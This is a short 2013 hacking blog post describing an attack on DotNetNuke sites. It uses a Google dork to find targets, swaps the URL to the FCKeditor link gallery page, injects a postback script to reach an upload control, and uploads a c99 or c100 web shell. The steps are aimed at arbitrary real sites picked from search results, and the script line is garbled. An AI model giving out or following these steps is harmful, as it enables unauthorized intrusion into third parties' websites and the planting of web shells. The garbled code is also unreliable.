GMAIL Hack website without sql injection,etc | Security Learner's Blog

Tuesday, 6 August 2013

Hack website without sql injection,etc

Actually, I have named this trick: "P0rt@l H@ck!ng (DNN)" 
Step 1: Go To- www.google.comStep 
2: Now enter this dork in search box- :inurl:/tabid/36/ language/en-US/Default.aspx Note: The code used to find vulnerable sites.. Use wisely.. 
Step 3: You will find many sites.. Select which you are comfortable.. 
Step 4: For example, if you take thir site- http:// www.abc.com/Home/tabid/36/language/en-US/Default.aspx Step 5: Now replace code: /Home/tabid/36/language/en-US/Default.aspx with this code: /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Step 6: You will get a link gallery page... So far.. So good!Don't do anything...
Step 7: Now replace the URL in address bar with this simple script code:
j-do Post Back ('ctlURL
$cmd Upload',")
Step 8: If the code not work remove the spaces.... Then select root and upload page shell c99, c100..appear at webpage..

FIDA HUSSAIN

I am Fida Hussain,a computer student from Pakistan. Right from the day one I was introduced to computers,I had a passion for Hacking and Information security. So,I started this blog in 2012 to share my views and ideas with the world.

1 comments:

  1. hey Ceh ,,

    I Need Your HElp bro

    ReplyDelete

 

Security Learner's Blog

Designed by Fida Hussain
This content is DMCA Protected.Copying or reproducing of procedure is prohibited.Do Not Copy!!